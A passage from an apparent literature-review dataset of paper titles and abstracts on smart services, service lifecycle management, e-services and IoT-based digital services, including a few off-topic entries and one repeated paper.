IT support is not the only ingredient for successfully managing services, it is a contribution to compensate for the growing complexity. Surprisingly, the topic of software application support in SLM has not yet received systematic coverage in the literature from a functional perspective. Consequently, this paper proposes a functional reference model for SLM and describes the underlying design process. The model supports practitioners in analyzing, designing and implementing software support for SLM. Further it enables to compare and evaluate existing software solutions and as such it supports IT investment decisions. Scientifically the model represents an approach towards designing information systems in the area of SLM. The paper argues that companies should pursue a best-of-breed approach, as there is no single solution available that comprehensively supports the entire lifecycle. Further, the lack of application support of SLM in practice mainly stems from the absence of integrated solutions and missing knowledge on how to evaluate potential applications. --- paper_title: Fuzzy Consensus Model for Governance in Smart Service Systems paper_content: Abstract Service Systems are means of value-co-creation and are considered “Smart” if they are supported by IT and react to external changes for the satisfaction of the whole. The co-production of value occurs by processes coordinating the participants, which exchange services, and including decision-making activities, such as the choice of a specific Service Provider. Making decisions is a matter of Governance that often conciliate the expectations of everyone. For the selection of Service Providers among a set of suitable ones, it is possible to consider a Fuzzy Consensus Model for a Group Decision Making (GDM) situation within a service scenario. We have a set of Service Providers (possible alternatives), and decision makers, who examine the choices to reach a common decision. The model considers fuzzy preference relations and an advice generation mechanism to support the decision makers. A case study, where heterogeneous experts have to evaluate a research project, is considered. The results indicate that the “most important” expert influence deeply the final decisions. --- paper_title: “Futurizing” smart service: implications for service researchers and managers paper_content: Purpose – The purpose of this paper is to craft a future research agenda to advance smart service research and practice. Smart services are delivered to or via intelligent objects that feature awareness and connectivity. For service researchers and managers, one of the most fascinating aspects of smart service provision is that the connected object is able to sense its own condition and its surroundings and thus allows for real-time data collection, continuous communication and interactive feedback. Design/methodology/approach – This article is based on discussions in the workshop on “Fresh perspectives on technology in service” at the International Network of Service Researchers on September 26, 2014 at CTF, Karlstad, Sweden. The paper summarizes the discussion on smart services, adds an extensive literature review, provides examples from business practice and develops a structured approach to new research avenues. Findings – We propose that smart services vary on their individual level of autonomous dec... --- paper_title: Development of a self-adapting intelligent system for building energy saving and context-aware smart services paper_content: Recent advances in ubiquitous technologies facilitate context-aware systems which can offer situation-based services. Wireless sensor networks (WSNs) have become increasingly important in recent years due to their ability to monitor and manage situational information for various intelligent services in ubiquitous environments. However, existing energy management systems are not effectively implemented in home and building environments due to their architectural limitations, such as static system architecture and a finite battery lifetime. Therefore, in this paper, we propose a Self-adapting intelligent system used for providing building control and energy saving services in buildings. Our system consists of a gateway (selfadapting intelligent gateway) and a sensor (self-adapting intelligent sensor). In addition, we also propose an energy-efficiency self-clustering sensor network (ESSN) and a node type indicator based routing (NTIR) protocol that considers the requirements of WSNs, such as network lifetime and system resource management. In order to verify the efficiency of our system, we implemented our system in real test bed and conducted experiments. The results show that autonomous power saving using our system is approximately 16-24% depending on the number of SIS. --- paper_title: IT SERVICE MANAGEMENT IN THE ACADEMIC CURRICULUM: COMPARING AN AUSTRALIAN AND GERMAN EXPERIENCE paper_content: Universities have a responsibility to equip graduates with the knowledge and skills to be productive in their work environment. Recently, the discipline of IT Service Management (ITSM) has become globally recognized as critical to organizations. Academia appears to be lagging industry in providing education in this field. This paper describes the motivation, implementation, outcomes and challenges experienced by two universities, one in Australia and the other in Germany, in designing and offering an ITSM course. Both universities included the curriculum for industry certification for Foundation level examinations and facilitated student access to these examinations. Using a narrative inquiry method, the authors share their experiences and compare these two courses. The feedback from students clearly indicates that the students value the opportunity to achieve industry certification in ITSM. A list of lessons learnt is formulated to assist other universities undertaking similar endeavours. The outcomes of the analysis highlight the need for professional development and industry certification of Lecturers, the importance of networking with local industry practitioners, and the importance of maintaining course materials to keep current with frameworks used in the ICT industry. --- paper_title: Checkpoints, hotspots and standalones: placing smart services over time and place paper_content: From the user's point of view Ubicomp and smart environments have been researched especially in the home setting. Nevertheless, papers discussing the relationship of situated interaction and context are few. Effect of context on interaction has been mostly investigated in the mobile setting. To work towards filling this gap, this paper presents a set of interaction profiles for digital services placed in an environment. The main focus of this paper is on deployment of interaction with various smart services in various indoor places. Motivation for this study stems from the need to understand interaction in and with the environment in order to better design smart environments. To this end we analyzed 30 hand-drawn maps of three different indoor spaces with user designed smart service placements and interactions. The results indicate how multi-level, structural, activity and attention data can be combined in interaction profiles. Interaction profiles found in this work are checkpoint, hotspot, standalone, remote and object, which each represent a unique combination of physical structure, service content and preferred interaction method. These profiles and cognitive map data can be used to support smart environment design. --- paper_title: Towards a Consistent Service Lifecycle Model in Service Governance paper_content: Introducing an SOA in a company brings new challenges for the existing management. Small loosely coupled services allow the Enterprise Architecture to flexibly adapt to existing business processes that themselves depend on changing market environments. SOA, however, introduces a new implicit system complexity. Service Governance approaches address this issue by introducing management processes and techniques, and best practices to cope with the new heterogeneity. Service lifecycle management is one aspect. Existing definitions of service lifecycles vary greatly.. In this paper, we compare existing service lifecycle approaches concerning defined phases and process. In particular, we challenge the purpose of the distinctions made between design time, runtime, and change time. Concluding, we propose a consolidated service lifecycle model for usage in Service Governance. --- paper_title: Interactions between Service and Product Lifecycle Management paper_content: Abstract The adoption of advanced manufacturing intelligence technologies requires managing the interaction of information in Product-Service Systems (PSS) by combining Product (PLM) and Service Lifecycle Management (SLM). While up to now no sound methodology exists, there is a strong need to have bi-directional coordination and interaction between PLM and SLM in a systematic way. A further challenge is to close loops, for example feedback from service delivery to the beginning-of-life phase of products. The objective of this paper is therefore to identify the interactions between SLM and PLM in manufacturing firms, based on expert interviews and illustrated in PSS use cases. --- paper_title: IMPROVED MODEL TO TEST APPLICATIONS USING SMART SERVICES paper_content: ABSTRACT: Smart applications are getting enormous popularity in the last several years. The research is conducted due to pressing need of rapid testing applications and improves quality models to ensure high quality of Smartphone applications. This work presents a basic approach to improve quality of mobile application by adjusting validation and test concepts for usage in mobile application development. We anticipate that the proposed solution will help the software companies to improve the quality of smartphone applications. Key words: quality assurance, testing mobile application, smart application, cloud computing, smart grid. 1 . INTRODUCTION The enormous progress nowadays for smart applications production and the marvelous acceptance from users for all categories [1] have become an amazing development in our life. Especially in the world of smart phones in general and in smart services specifically, which led to competitions on application development in case of meeting basic needs of users and enabling them to access different services in all spheres of life. This conversion came with the strategic use of the latest information and communication technologies [11,12] achieving user satisfaction by providing flexible and interactive means of communication and intelligent features which work anywhere and anytime across many devices. In the current era, there is an application for everything starting from games, passing through configuration tasks to communications and GPS (Global Positioning System) applications. As a result, it becomes incumbent on anyone who tries to establish business and services in the area of internet to put smart phone applications as the priority. Moreover, when developers devise an application, there are a number of important aspects that they take into account, for instance: the idea, design and promotion besides taking into consideration the difference between smart applications and software for traditional computers. After this development and progress it has become an important issue to support smart devices by several kind of applications with high efficiency. This corresponds to the important role of this area of how we test these applications to represent an intelligent application in smart services [6,8]. We present an advanced model to test the range of efficiency and quality assurance of applications in the framework of smart services. Further paper is organized as follows. Section II covers the related work and defines the problem to be addressed. Section III illustrates the proposed solution. --- paper_title: Smart services for home automation. managing concurrency and failures: New wine in old bottles ? paper_content: Home automation represents a growing market in the industrialized world. Today's systems are mainly based on ad hoc and proprietary solution, with little to no interoperability and smart integration. However, in a not so distant future, devices installed in our home will be able to smartly interact and integrate in order to offer complex services with rich functionalities. Realizing this kind of integration push developers to increase the amount of abstraction within the software architecture. In this paper we give a high-level view of what are the inherent trade-offs that stem from this process of abstraction and suggest how they could be tackled in these complex home automation systems. More specifically we focus our analysis on two problems: concurrent execultion of multiple plans and failure detection. --- paper_title: Continuous Quality Improvement of IT Processes based on Reference Models and Process Mining paper_content: The inherent quality of business processes increasingly plays a significant role in the economic success of an organization. More and more business processes are supported through IT processes. In this contribution, we present a new approach which allows the continuous quality improvement of IT processes by the interconnection of IT Infrastructure Library (ITIL) reference model and process mining. On the basis of the reference model, to-be processes are set and key indicators are determined. As-is processes and their key indicators derived by process mining are subsequently compared to the to-be processes. This new approach enables the design and control of ITIL based customer support processes which will be trialed in a practice case of a customer relationship management (CRM) system. The procedural models, as well as its results, are introduced in this publication. --- paper_title: Enhancing Literature Review Methods - Evaluation of a Literature Search Approach based on Latent Semantic Indexing paper_content: Literature search, as a fundamental and time"consum ing step in a literature research process, is part of many established scientific research methods. The facilitated access to scientific resources requires an increasing effort to conduct comprehensive literature reviews. We address the lack of semantic approaches in this context by proposing and evaluating our Tool for Semantic Indexing and Similarity Queries (TSISQ) for the enhancement of established literature review methods. Its applicability is evaluated in different environments and search cases covering realistic applications. Results indicate that TSISQ can increase efficiency by saving valuable time in finding relevant literature in a desired research field, improve the quality of search results, and enhance the comprehensiveness of a review by identifying sources that otherwise would not have been considered. The target audience includes all researchers who need to efficiently gain an overview of a specific research field and refine the theoretical foundations of their research. --- paper_title: Willingness to believe and betrayal aversion: the special role of trust in art exchanges paper_content: Lack of transparency is considered a major functional deficiency of art markets. The uniqueness of artworks, the subjectivity of the pleasure component in their appeal, the unequal access to verifiable information make information asymmetries, and their potential opportunistic use, one of the dominant characteristics of this market and one that is very difficult to remedy. Yet, art goods are not simply risk-intensive goods, as are financial assets. Their complexity and specificity have given ample room, not only for calls for greater transparency and more credible information, but also for building trust-based long-term relationships. Drawing on the distinction between decisions involving risk and decisions involving trust, the paper discusses how relational trust, based on confidentiality and reciprocity, has helped compensate for the lack of transparency to increase the overall trustworthiness of art markets. Yet, trust-based exchanges have a downside too, since trust, once gained, can also be used opportunistically to defend and exploit positions of privilege and power. This form of strategic trust can become an obstacle to the diffusion of information and the adoption of credible norms of transparency. --- paper_title: Analyzing the past to prepare for the future: Writing a literature review paper_content: A review of prior, relevant literature is an essential feature of any academic project. An effective review creates a firm foundation for advancing knowledge. It facilitates theory development, closes areas where a plethora of research exists, and uncovers areas where research is needed. --- paper_title: Single-RF MIMO-OFDM system with beam switching antenna paper_content: In this paper, we investigate the replica interference problem of a multiple input multiple output (MIMO) receiver with a beam switching antenna (BSA) within the orthogonal frequency division multiplexing (OFDM) framework. Our frequency-domain analysis has revealed the following important findings: (i) without co-existing system, replica interference in the system can be completely avoided as long as the beam pattern switching rate of the BSA receiver is an integer multiple of the product of the OFDM sampling rate and the number of receiving beam patterns and (ii) with co-existing systems, replica interference cannot always be avoided because co-existing systems may induce replicas in the operating frequency bands of the system. We present a replica interference criterion that depends on the co-existing status and users’ beam switching capabilities. Based on our findings, we propose various replica interference avoidance (RINA) strategies for different co-existing and cooperating network scenarios. In addition, the overall network operation principles of the proposed RINA strategy are presented. Simulation results verify that the proposed MIMO-OFDM system with a BSA successfully provides both MIMO and OFDM benefits, thereby resolving replica interference issues. --- paper_title: Designing wrapper components for e-services in integrating heterogeneous systems paper_content: Component-based approaches are becoming more and more popular to support Internet-based application development. Different component modeling approaches, however, can be adopted, obtaining different abstraction levels (either conceptual or operational). In this paper we present a component-based architecture for the design of e-applications, and discuss the concept of wrapper components as building blocks for the development of e-services, where these services are based on legacy systems. We discuss their characteristics and their applicability in Internet-based application development. --- paper_title: Towards a Consistent Service Lifecycle Model in Service Governance paper_content: Introducing an SOA in a company brings new challenges for the existing management. Small loosely coupled services allow the Enterprise Architecture to flexibly adapt to existing business processes that themselves depend on changing market environments. SOA, however, introduces a new implicit system complexity. Service Governance approaches address this issue by introducing management processes and techniques, and best practices to cope with the new heterogeneity. Service lifecycle management is one aspect. Existing definitions of service lifecycles vary greatly.. In this paper, we compare existing service lifecycle approaches concerning defined phases and process. In particular, we challenge the purpose of the distinctions made between design time, runtime, and change time. Concluding, we propose a consolidated service lifecycle model for usage in Service Governance. --- paper_title: Sensing as a Service Model for Smart Cities Supported by Internet of Things paper_content: The world population is growing at a rapid pace. Towns and cities are accommodating half of the world's population thereby creating tremendous pressure on every aspect of urban living. Cities are known to have large concentration of resources and facilities. Such environments attract people from rural areas. However, unprecedented attraction has now become an overwhelming issue for city governance and politics. The enormous pressure towards efficient city management has triggered various Smart City initiatives by both government and private sector businesses to invest in ICT to find sustainable solutions to the growing issues. The Internet of Things (IoT) has also gained significant attention over the past decade. IoT envisions to connect billions of sensors to the Internet and expects to use them for efficient and effective resource management in Smart Cities. Today infrastructure, platforms, and software applications are offered as services using cloud technologies. In this paper, we explore the concept of sensing as a service and how it fits with the Internet of Things. Our objective is to investigate the concept of sensing as a service model in technological, economical, and social perspectives and identify the major open challenges and issues. --- paper_title: Personalization vs. Customization: Which is More Effective in e-Services? paper_content: More flexible and agile Information Technology (IT) architecture is needed by a firm to respond to dynamic and competitive business environments. Web Service, which is defined as a software construct that exposes business functionality over the Internet, is considered to be the next vision to provide not only new IT architecture and strategies for enterprises, but also a technological basis for design/redesign of business processes. This research proposes a framework and methodology to design business processes with Web services. A formal model, which reflects strategic, economic, and structural perspectives, to identify and evaluate alternative Web services portfolio in business processes is proposed. The objective of this research is to provide a comprehensive and theoretical formulation for Web services to design/redesign business processes and business networks. --- paper_title: Towards Smart Service Networks: An Interdisciplinary Service Assessment Metrics paper_content: Service Networks (SNs) are open systems accommodating the co-production of new knowledge and services through organic peer-to-peer interactions. Key to broad success of SNs in practice is their ability to foster and ensure a high performance. By performance we mean the joint effort of tremendous interdisciplinary collaboration, cooperation and coordination among the network participants. However, due to the heterogeneous background of such participants (i.e., business, technical, etc.), different interpretations of the shared terminology are likely to happen. Thus, confusion may appear in the multi-disciplinary communication of SNs participants which in turn may lead to performance anomalies. To deal with such a problem, we propose a novel framework of bi-dimensional (business vs technical) performance metric indicators built on the basis of a systems thinking mindset. By using our framework, a holistic picture of the multiple dimensions and structure of SNs is provided, so that the interdisciplinary service participants have a correct understanding of the service scope and required resources in operation. Moreover, and most importantly, it provides a way to examine the performance traceability of the services within a SN. --- paper_title: A software framework for enabling smart services paper_content: ‘Smart’ becomes a buzzword in many sectors of the society. Among them, Smart Service is an emerging paradigm for delivering services with ‘smartness’ features. A key ingredient of smart services is various types of contexts including mobile and social contexts. With the advent of sensor technology and availability in mobile devices, contexts become a key source of information from which situations can be inferred. And, situation-specific services have a high potential of being smart services. However, a number of fundamental technical issues remain unresolved, especially in the area of software framework for developing and deploying smart services. In this paper, we present a software framework for context-aware smart life services, Smart Service Framework (SSF). We begin by defining smart services with key characteristics, and define our architectural design of the SSF. We also define a process for provisioning smart services. And, we specify guidelines and algorithms needed for carrying out the four activities in the process. --- paper_title: A Socio-Technical Approach to Study Consumer-Centric Information Systems. paper_content: Given the unprecedented role of digital service platforms in private life, this research sets out to identify the mechanisms that are designed into information systems with the purpose to increase consumer centricity. We evaluate the consumer centricity of an information system against three reflective indicators, that is the degree of need orientation, value co-creation and relationship orientation and conceptualize consumer centricity as the ability to align social and technical information system components. ::: We employ a positivist, explanatory case study approach to test three hypotheses on system component alignment in cases from three domains (gaming, social networking, and video sharing). We found preliminary evidence for three alignment mechanisms that increase consumer centricity. ::: With this research, we plan to contribute to the literature on consumer-centric information systems by elaborating and empirically grounding a socio-technical approach to study mechanisms and their joint application to increase consumer centricity in information systems. --- paper_title: The next industrial revolution: Integrated services and goods paper_content: The outputs or products of an economy can be divided into services products and goods products (due to manufacturing, construction, agriculture and mining). To date, the services and goods products have, for the most part, been separately mass produced. However, in contrast to the first and second industrial revolutions which respectively focused on the development and the mass production of goods, the next — or third — industrial revolution is focused on the integration of services and/or goods; it is beginning in this second decade of the 21st Century. The Third Industrial Revolution (TIR) is based on the confluence of three major technological enablers (i.e., big data analytics, adaptive services and digital manufacturing); they underpin the integration or mass customization of services and/or goods. As detailed in an earlier paper, we regard mass customization as the simultaneous and real-time management of supply and demand chains, based on a taxonomy that can be defined in terms of its underpinning component and management foci. The benefits of real-time mass customization cannot be over-stated as goods and services become indistinguishable and are co-produced — as “servgoods” — in real-time, resulting in an overwhelming economic advantage to the industrialized countries where the consuming customers are at the same time the co-producing producers. --- paper_title: Exploring the role of E-maintenance for value creation in service provision paper_content: Technological innovations has always played an important role in economic growth and industrial productivity, but they have also potential to influence service industry. In particular, they can offer support to the process of servitization in manufacturing companies. This article presents a study regarding the prospective value that different technological innovations can offer to maintenance service provision. A review of different baseline technologies and a categorization of several types of E-maintenance tools and applications has been carried out in order to understand the new functionalities that can potentially bring to the provision of smart maintenance services. Moreover, a value analysis method for representing the contribution of tool categories to several value dimensions is presented here. This method can be used for identifying the best technological solution, matching both customer value and provider value, i.e. conforming a win-win situation for the parties involved in the service provision. Some preliminary results based on a survey are eventually given as a first test of its applicability. --- paper_title: Contrasting risk perceptions of technology-based service innovations in inter-organizational settings paper_content: Despite the rapid growth and potential of technology-based services, managers' greatest challenges are gaining customer acceptance and increasing usage of these new innovative services. In the B2C field, studies of self-service technology show that perceived risk is an important factor influencing the use of service technology. Though prior research explores different risk types that emerge in consumer settings, risk perception in the B2B setting lacks a detailed examination of different risk types influencing technology-based service adoption. Data from 49 qualitative interviews with providers and customers in two different B2B industries inform this study. The findings emphasize the importance of functional and financial risks in a B2B context and show that business customers' personal and psychological fears hinder their use of technology-based services. Results highlight differences in risk perception and evaluation between customers and providers. --- paper_title: Digital Service Innovation from Open Data: Exploring the Value Proposition of an Open Data Marketplace paper_content: Open data marketplaces have emerged as a mode of addressing open data adoption barriers. However, knowledge of how such marketplaces affect digital service innovation in open data ecosystems is limited. This paper explores their value proposition for open data users based on an exploratory case study. Five prominent perceived values are identified: lower task complexity, higher access to knowledge, increased possibilities to influence, lower risk and higher visibility. The impact on open data adoption barriers is analyzed and the consequences for ecosystem sustainability is discussed. The paper concludes that open data marketplaces can lower the threshold of using open data by providing better access to open data and associated support services, and by increasing knowledge transfer within the ecosystem. --- paper_title: High Tech and High Touch: A Framework for Understanding User Attitudes and Behaviors Related to Smart Interactive Services paper_content: Smart interactive services, in contrast with other technology-based services, require significant human-to-human interaction and collaboration in addition to the service provided by the embedded technology itself. The authors’ foundational Delphi study confirms smart interactive services (e.g., remote diagnosis, remote repair of equipment, and telemedicine) are a rapidly growing innovation category across industries. Yet, gaining user acceptance of these types of services presents a significant challenge for managers. To address this challenge, the authors employ a grounded theory approach, drawing on depth interviews, to develop a framework of barriers and facilitators to users’ attitudinal and behavioral responses to smart interactive services. The findings reveal a new set of beliefs that are critical in this context. These beliefs are tied to the human element and specifically pertain to beliefs about the “service counterpart (SC),” who is the provider’s employee controlling the technology. Control, t... --- paper_title: Smart governance for smart industries paper_content: In this paper, we present a vision of smartness as an environment in which humans and devices, visible and unseen, provide a wide range of e-services trying to make a person's life easier, more comfortable and more efficient. Economic and privacy issues are discussed as the most challenging. We argue that only direct income from consumers of e-services may guarantee sustainable development of smart industries. We present threats coming from smart industries and smart governance which may abuse trust of people who are served. We indicate the triple role of smart governance: first, to become smart and avoid a smartness gap between the public and private sectors; second, to boost smart industries, while third, and simultaneously, enforcing the codes of protecting privacy. --- paper_title: Interoperable eHealth platform for personalized smart services paper_content: Independent living is one of the main challenges linked to an increasing ageing population and concerns both patients and healthy elderlies. A lot of research has focused on the area of ambient-assisted living (AAL) technologies towards an intelligent caring home environment able to offer personalized context-aware applications to serve the user's needs. This paper proposes the use of advised sensing, context-aware and cloud-based lifestyle reasoning to design an innovative eHealth platform that supports highly personalized smart services to primary users. The architecture of the platform has been designed in accordance with the interoperability requirements and standards as proposed by ITU-T and Continua Alliance. In particular, we define the interface dependencies and functional requirements needed, to allow eCare and eHealth vendors to manufacture interoperable sensors, ambient and home networks, telehealth platforms, health support applications and software services. Finally, data mining techniques in relation to the proposed architecture are also proposed to enhance the overall AAL experience of the users. --- paper_title: A service-oriented framework to the design of information system service paper_content: The beginning of this century is marked by a paradigm shift due to the move of the production focus from goods-dominant to a service-dominant. At the same time, manufacturing automation and integration are undergoing changes, which open the possibility for classical model oriented products to be replaced by service models, supported by cognitive information systems. This paper analyzes a proposal to achieve a sound design process for service systems, which follows the model driven tendency. In fact, the aim is to bring together practical and formal approach, and therefore, to propose a good design discipline based on SOMF (Service Oriented Model Framework). Based on this model driven approach a new environment were developed which supports elicitation, modeling and requirements analysis supported by semi-formal methods (SOMF and UML) and formal methods (by using SysML and Petri Nets). The proposed method is applied to a case study based in an urban Smart Grid. --- paper_title: Design of emerging digital services: a taxonomy paper_content: There has been a gigantic shift from a product based economy to one based on services, specifically digital services. From every indication it is likely to be more than a passing fad and the changes these emerging digital services represent will continue to transform commerce and have yet to reach market saturation. Digital services are being designed for and offered to users, yet very little is known about the design process that goes behind these developments. Is there a science behind designing digital services? By examining 12 leading digital services, we have developed a design taxonomy to be able to classify and contrast digital services. What emerged in the taxonomy were two broad dimensions; a set of fundamental design objectives and a set of fundamental service provider objectives. This paper concludes with an application of the proposed taxonomy to three leading digital services. We hope that the proposed taxonomy will be useful in understanding the science behind the design of digital services. --- paper_title: Cloud semantic-based dynamic multimodal platform for building mhealth context-aware services paper_content: Currently, everybody wish to access to applications from a wide variety of devices (PC, Tablet, Smartphone, Set-top-box, etc.) in situations including various interactions and modalities (mouse, tactile screen, voice, gesture detection, etc.). At home, users interact with many devices and get access to many multimedia oriented documents (hosted on local drives, on cloud storage, online streaming, etc.) in various situations with multiple (and sometimes at the same time) devices. The diversity and heterogeneity of users profiles and service sources can be a barrier to discover the available services sources that can come from anywhere from the home or the city. The objective of this paper is to suggest a meta-level architecture for increasing the high level of context concepts abstracting for heterogeneous profiles and service sources via a top-level ontology. We particularly focus on context-aware mHealth applications and propose an ontologies-based architecture, OntoSmart (a top-ONTOlogy SMART), which provides adapted services that help users to broadcast of multimedia documents and their use with interactive services in order to help in maintaining old people at home and achieving their preferences. In order to validate our proposal, we have used Semantic Web, Cloud and Middlewares by specifying and matching OWL profiles and experiment their usage on several platforms. --- paper_title: User involvement in the innovation process: Development of a framework for e-services paper_content: This paper focuses on user involvement in the innovation process in the area of services and especially e-services, a highly unexplored topic. Our research is built on a comprehensive review of the resource-based view, customer/user integration and e-services. A qualitative investigation is performed to explore the situation concerning user involvement in several different companies offering e-services. Based on our findings and previous research a framework for analyzing existing involvement activities and for the generation of new forms of user involvement in the innovation process is developed. The framework consists out of six dimensions and also takes into account internal and external factors affecting the company's innovation activities. --- paper_title: Adaptive blurring of sensor data to balance privacy and utility for ubiquitous services paper_content: Given the trend towards mobile computing, the next generation of ubiquitous "smart" services will have to continuously analyze surrounding sensor data. More than ever, such services will rely on data potentially related to personal activities to perform their tasks, e.g. to predict urban traffic or local weather conditions. However, revealing personal data inevitably entails privacy risks, especially when data is shared with high precision and frequency. For example, by analyzing the precise electric consumption data, it can be inferred if a person is currently at home, however this can empower new services such as a smart heating system. Access control (forbid or grant access) or anonymization techniques are not able to deal with such trade-off because whether they completely prohibit access to data or lose source traceability. Blurring techniques, by tuning data quality, offer a wide range of trade-offs between privacy and utility for services. However, the amount of ubiquitous services and their data quality requirements lead to an explosion of possible configurations of blurring algorithms. To manage this complexity, in this paper we propose a platform that automatically adapts (at runtime) blurring components between data owners and data consumers (services). The platform searches the optimal trade-off between service utility and privacy risks using multi-objective evolutionary algorithms to adapt the underlying communication platform. We evaluate our approach on a sensor network gateway and show its suitability in terms of i) effectiveness to find an appropriate solution, ii) efficiency and scalability. --- paper_title: A Context-Aware Services Development Model paper_content: currently the context models focus more on the expression ability rather on the automatic deployment and execution capability. Also a context aware platform is required to support the modeling and automatic deployment and execution of the context aware system. This paper aims to build an executable context model and define the architecture of the context aware system as well. Firstly a context-aware services development model is proposed. And then the architecture of the context-aware system is defined. The lifecycle of such system includes two phase, namely design phase and running phase. In service design phase, the development model can describe user's context, situation, and services' configuration information. While in running phase, the execution engine can build the instances of a model and navigating the execution of the model, namely, receive the context changing events, manage the user's Scene transitions and invoke the context-aware services according to the scene's configuration. In addition the model is exemplified with an elder health monitoring model. --- paper_title: Conceptual framework for services creation/development environment in telecom domain paper_content: The telecom service providers (fixed and mobile) understand that they must bring in new smart services in order to attract new customers, retain existing ones and increase revenue. The challenges and goals for doing so are as follows: determining which services are needed; introducing more services in a faster manner and at lower costs; delivering innovative services in a way that allows existing users to migrate smoothly to new ones. These goals could not be achieved with traditional closed and proprietary network infrastructure, as the vendor lock-in involved in that infrastructure results in limited scope of services, and dependency on old business models. New services require a much greater degree of system flexibility, performance and scalability, as well as open standards. Next Generation Network (NGN) provide the means for enabling agile service creation capabilities that facilitate better user experiences by integrating both new and legacy services across any access. However, NGNs involve complex structures even for simple services as they consist of a large number of building blocks and necessitate hierarchical models with a lot of parallel subsystems. Thus, particular attention has to be paid to understanding and modelling the performance of these systems. The rationale of this paper lies in developing a design and engineering methodology (based on a mathematical foundation) that addresses the service creation aspects for those fields in which traditional approaches will not work for NGNs. --- paper_title: Case study: From legacy to connectivity migrating industrial devices into the world of smart services paper_content: Europa has launched multiple initiatives and research projects to remain competitive in a globalized world and keep industry and manufacturing on-shore. Funded by EU and member countries, project ARROWHEAD[1] focuses research and innovation for collaborative automation using interoperable services for smart production, to improve quality, efficiency, flexibility and cost competiveness. This includes an important new aspect called “Smart Services”, which aims to apply SOA (service oriented architecture) to maintenance and service of production systems and its parts, which still carry a huge potential for further gains in cost and energy savings. However, there will be no “big bang”. How can we turn present-day variety of diverse, specialized, and legacy loaded embedded systems into connected, SOA based cooperating participants of the Internet of Things (IoT)? This case study portrays the solution followed in ARROWHEAD WP1.1, for devices used in end-ofline (EoL) test systems in automotive powertrain production. --- paper_title: Smart tourism: foundations and developments paper_content: Smart tourism is a new buzzword applied to describe the increasing reliance of tourism destinations, their industries and their tourists on emerging forms of ICT that allow for massive amounts of data to be transformed into value propositions. However, it remains ill-defined as a concept, which hinders its theoretical development. The paper defines smart tourism, sheds light on current smart tourism trends, and then lays out its technological and business foundations. This is followed by a brief discussion on the prospects and drawbacks of smart tourism. The paper further draws attention to the great need for research to inform smart tourism development and management. --- paper_title: Digital service analysis and design: the role of process modelling paper_content: Digital libraries are evolving from content-centric systems to person-centric systems. Emergent services are interactive and multidimensional, associated systems multi-tiered and distributed. A holistic perspective is essential to their effective analysis and design, for beyond technical considerations, there are complex social, economic, organisational, and ergonomic requirements and relationships to consider. Such a perspective cannot be gained without direct user involvement, yet evidence suggests that development teams may be failing to effectively engage with users, relying on requirements derived from anecdotal evidence or prior experience. In such instances, there is a risk that services might be well designed, but functionally useless. This paper highlights the role of process modelling in gaining such perspective. Process modelling challenges, approaches, and success factors are considered, discussed with reference to a recent evaluation of usability and usefulness of a UK National Health Service (NHS) digital library. Reflecting on lessons learnt, recommendations are made regarding appropriate process modelling approach and application. --- paper_title: BIT — A framework and architecture for providing digital services for physical products paper_content: Mobile phones are increasingly able to read auto-id labels, such as barcodes or RFID tags. As virtually all consumer products sold today are equipped with such a label, this opens the possibility for a wide range of novel digital services building on physical products. In this paper, we discuss the problems that arise when such novel applications are deployed, and present a unified system architecture for providing mobile phone-based digital services in the Internet of Things, called BIT. BIT aims to be a “single point of interaction” for users when accessing the services of a variety of tagged objects. BIT also aids service developers and product manufacturers in deploying services linked to tagged products, by providing a cross-device development and deployment framework. We have used BIT to quickly implement nine diverse services in a prototypical fashion, and report on our inital experiences with the framework. --- paper_title: Strategies in Smart Service Systems Enabled Multi-sided Markets: Business Models for the Internet of Things paper_content: Internet of Things has the potential to disrupt industries through changing products, services, and business models just as the Internet did in the '90s. Machine-to-machine communication is at the core of Internet of Things. Machines that we interact with in everyday life will start interacting with each other, collect data, and even use advances in data technologies to make decisions for us. Organizations, in order to achieve the highest profit, should also redesign their business service models conscientiously around externalities across markets that link through platforms and be specific about which markets to serve. In this research, we aim to build business ownership strategies to further two-sided markets and platforms literature. Herein, we focus on a number of business service models that link four sides of a market, and compare the advantages and disadvantages of network externalities generated by Internet of Things in each model. --- paper_title: Global Sensor Modeling and Constrained Application Methods Enabling Cloud-Based Open Space Smart Services paper_content: The deployment and provisioning of intelligent systems and utility-based services will greatly benefit from a cloud-based intelligent middleware framework, which could be deployed over multiple infrastructure providers (such as smart cities, hospitals, campus and private enterprises, offices, etc.) in order to deliver on-demand access to smart services. This paper introduces the formulation of an open source integrated intelligent platform as solution for integrating global sensor networks, providing design principles for cloud-based intelligent environments and discuss infrastructure functional modules and their implementation. This paper review briefly technologies enabling the framework, towards emphasizes on demand establishment of smart cities services based on the automated formulation of ubiquitous intelligence of Internet connected objects. The framework introduced founds on the GSN infrastructure. The framework leverages W3C SSN-XG formal language and the IETF COAP protocol, providing support for enabling intelligent (sensors-objects) services. The service requirements for particular smart city scenario are introduced and initial implementations and results from performed simulations studied and discussed. --- paper_title: Ubiquitous Infrastructure and Smart Service on City Gas Environments in Korea paper_content: The information technology paradigm shifts to smart service environment, as ubiquitous technologies are used in the latest industry trend. The major features of ubiquitous smart service are high dynamism and heterogeneity of their environment and the need for context awareness. In order to resolve these features, it is necessary to develop middleware that meet various new requirements. This paper designed middleware on ubiquitous smart service for enhancing the safety and reliability to city gas environment in Korea. The object of this paper will support cornerstone in order to construct the framework of intelligent infrastructure and service for autonomic management. --- paper_title: Developing Advanced Context Aware Tools for Mobile Maintenance paper_content: Abstract The rapid technological progress in the domains of wireless sensor networks, mobile application development and computational intelligence has fueled the construction of "smart" environments in both domestic and industrial settings. Such environments are equipped with a wide range of sensors, identification tags and interaction devices, capable of sensing, recording, interpreting and reacting to human activity and presence. Context-awareness constitutes a major challenge for developers of smart services, since both design and implementation are increasingly supported by widely adopted frameworks and well-structured tools. The value adding features of context-based services find their way into many industrial systems through the adoption of mobile computing. Acting as a constant context monitoring agent, a tablet or a smartphone can expand the capacity of a shoop floor system actor to carry out asset management tasks. Context interpretation and system adaptation are highly specialized processes that essentially use predefined or dynamically build semantics to filter and configure the mobile actor's access session. In this paper we discuss the context semantics for an IT infrastructure that serves engineering asset management and specifically supports maintenance practice and planning. Evaluating the available software methodologies that can drive the implementation of such an infrastructure, we perform a suitability study for the development of a maintenance management and a condition monitoring portable client. Our goal is to identify and assess the weighted significance for a domain-focused set of functional parameters, used to define a context-based mobile tool scaled for industrial shop-floor complexity. --- paper_title: Network ontology and dynamics analysis for collaborative innovation in digital services paper_content: With the advances of digital technologies and participative webs of services, knowledge-intensive digital services have thrived on a rapidly expanding platform-based network economy. There is a great need for a comprehensive research on 